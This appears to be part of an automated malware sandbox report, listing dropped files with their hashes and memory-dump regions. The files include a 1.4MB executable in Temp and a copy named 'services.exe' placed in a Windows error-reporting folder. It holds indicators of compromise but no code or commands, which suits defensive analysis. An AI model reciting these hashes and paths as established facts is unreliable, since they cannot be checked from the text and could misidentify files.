958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\f41ca93d8deb491c3651a25177edbfdec809d4f4.exe

Filesize
1.4MB

MD5
958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8727e808e9f69e95b5cb0a7a7c070e6c

SHA1
d67aeeb48aa917481b66b0af713428ce00459143

SHA256
b643f6f4dc5e8fe165aedf6ed1c29f1cd573757d85f660d5c027c77a49304770

SHA512
dc1b4daaf0f901a3b4d92fb57b33fcd97486f19778e18ca8280e82f131218c1ab0b6556fa8557fa3c9b9557461670fce905d7e59374573f405594f9a1f14c6b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8727e808e9f69e95b5cb0a7a7c070e6c

SHA1
d67aeeb48aa917481b66b0af713428ce00459143

SHA256
b643f6f4dc5e8fe165aedf6ed1c29f1cd573757d85f660d5c027c77a49304770

SHA512
dc1b4daaf0f901a3b4d92fb57b33fcd97486f19778e18ca8280e82f131218c1ab0b6556fa8557fa3c9b9557461670fce905d7e59374573f405594f9a1f14c6b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8727e808e9f69e95b5cb0a7a7c070e6c

SHA1
d67aeeb48aa917481b66b0af713428ce00459143

SHA256
b643f6f4dc5e8fe165aedf6ed1c29f1cd573757d85f660d5c027c77a49304770

SHA512
dc1b4daaf0f901a3b4d92fb57b33fcd97486f19778e18ca8280e82f131218c1ab0b6556fa8557fa3c9b9557461670fce905d7e59374573f405594f9a1f14c6b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8727e808e9f69e95b5cb0a7a7c070e6c

SHA1
d67aeeb48aa917481b66b0af713428ce00459143

SHA256
b643f6f4dc5e8fe165aedf6ed1c29f1cd573757d85f660d5c027c77a49304770

SHA512
dc1b4daaf0f901a3b4d92fb57b33fcd97486f19778e18ca8280e82f131218c1ab0b6556fa8557fa3c9b9557461670fce905d7e59374573f405594f9a1f14c6b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JKHRI9RXR0BKJ3B0GH7U.temp

Filesize
7KB

MD5
8727e808e9f69e95b5cb0a7a7c070e6c

SHA1
d67aeeb48aa917481b66b0af713428ce00459143

SHA256
b643f6f4dc5e8fe165aedf6ed1c29f1cd573757d85f660d5c027c77a49304770

SHA512
dc1b4daaf0f901a3b4d92fb57b33fcd97486f19778e18ca8280e82f131218c1ab0b6556fa8557fa3c9b9557461670fce905d7e59374573f405594f9a1f14c6b6

Download Submit
C:\Windows\PCHEALTH\ERRORREP\QHEADLES\services.exe

Filesize
1.4MB

MD5
d0900ea4e15a6cd4b816db13d470413d

SHA1
ac9f67faaed0eab9f6fc3b36a3277594ad2f0a06

SHA256
cb8f479c225aa312bfb7dde68f0f243590d1982a3141b5661277890054476a60

SHA512
9b9c3a8685addf68edfb33df33a4c7faa87a7bd9fc6de550214e558eb91aa3a74d63e47be6b204055d1b5d2b20110f1828565bc27bf71648a2973f028065dece

Download Submit
memory/564-343-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/564-340-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/564-341-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/592-331-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/1756-289-0x0000000000360000-0x00000000004CC000-memory.dmp

Filesize
1.4MB

Download
memory/1756-290-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2004-338-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/2004-339-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/2272-301-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2272-333-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/2272-334-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/2304-352-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-353-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2360-22-0x000000001A730000-0x000000001A738000-memory.dmp

Filesize
32KB

Download
memory/2360-19-0x000000001A710000-0x000000001A71E000-memory.dmp

Filesize
56KB

Download
memory/2360-145-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-125-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-161-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-100-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-99-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-218-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-86-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-242-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-254-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-279-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-74-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-73-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-69-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-68-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2360-45-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-38-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-29-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-24-0x000000001AC00000-0x000000001AC0C000-memory.dmp

Filesize
48KB

Download
memory/2360-23-0x000000001A740000-0x000000001A74A000-memory.dmp

Filesize
40KB

Download
memory/2360-0-0x0000000000350000-0x00000000004BC000-memory.dmp

Filesize
1.4MB

Download
memory/2360-330-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2360-21-0x000000001A720000-0x000000001A72C000-memory.dmp

Filesize
48KB

Download
memory/2360-1-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2360-20-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-126-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-2-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/2360-3-0x00000000002C0000-0x00000000002CE000-memory.dmp

Filesize
56KB

Download
memory/2360-4-0x00000000002D0000-0x00000000002D8000-memory.dmp

Filesize
32KB

Download
memory/2360-18-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/2360-17-0x0000000002270000-0x000000000227E000-memory.dmp

Filesize
56KB

Download
memory/2360-16-0x0000000002260000-0x000000000226A000-memory.dmp

Filesize
40KB

Download
memory/2360-15-0x0000000002160000-0x0000000002168000-memory.dmp

Filesize
32KB

Download
memory/2360-14-0x0000000002150000-0x000000000215C000-memory.dmp

Filesize
48KB

Download
memory/2360-5-0x0000000000300000-0x000000000031C000-memory.dmp

Filesize
112KB

Download
memory/2360-6-0x00000000002E0000-0x00000000002E8000-memory.dmp

Filesize
32KB

Download
memory/2360-7-0x0000000000320000-0x0000000000330000-memory.dmp

Filesize
64KB

Download
memory/2360-13-0x0000000002140000-0x0000000002148000-memory.dmp

Filesize
32KB

Download
memory/2360-12-0x0000000002130000-0x000000000213C000-memory.dmp

Filesize
48KB

Download
memory/2360-11-0x0000000000660000-0x000000000066C000-memory.dmp

Filesize
48KB

Download
memory/2360-10-0x00000000005D0000-0x00000000005DA000-memory.dmp

Filesize
40KB

Download
memory/2360-9-0x00000000005C0000-0x00000000005D0000-memory.dmp

Filesize
64KB

Download
memory/2360-8-0x0000000000330000-0x0000000000346000-memory.dmp

Filesize
88KB

Download
memory/2896-337-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/2896-336-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2896-335-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/2924-350-0x00000000026D0000-0x0000000002750000-memory.dmp

Filesize
512KB

Download
memory/2924-347-0x00000000026D0000-0x0000000002750000-memory.dmp

Filesize
512KB

Download
memory/2924-345-0x000007FEED3F0000-0x000007FEEDD8D000-memory.dmp

Filesize
9.6MB

Download
memory/2924-332-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download